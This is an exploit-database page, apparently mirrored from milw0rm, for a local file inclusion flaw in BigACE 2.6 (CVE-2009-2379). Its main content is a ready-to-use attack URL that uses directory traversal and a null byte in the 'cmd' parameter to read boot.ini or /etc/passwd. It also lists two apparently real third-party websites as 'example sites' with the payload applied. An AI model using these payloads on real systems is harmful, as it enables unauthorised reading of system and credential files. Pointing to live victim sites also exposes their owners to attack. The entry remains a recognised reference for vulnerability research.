[] NeoSense
E X P L O I T S
title author type platform port cve id

BigACE 2.6 - 'cmd' Local File Inclusion

Author: CWD@rBe
type: webapps
platform: php
port: 
date_added: 2009-06-29 
date_updated: 2016-11-28 
verified: 1 
codes: OSVDB-55510;CVE-2009-2379 
tags: 
aliases:  
screenshot_url:  
application_url: 
-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6

download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip

Author     : CWD@rBe

Special Thanks : www.cyber-warrior.org

***************************************************************************************************************
exploit:

http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len

example sites

1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

****************************************************************************************************************

# milw0rm.com [2009-06-30]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.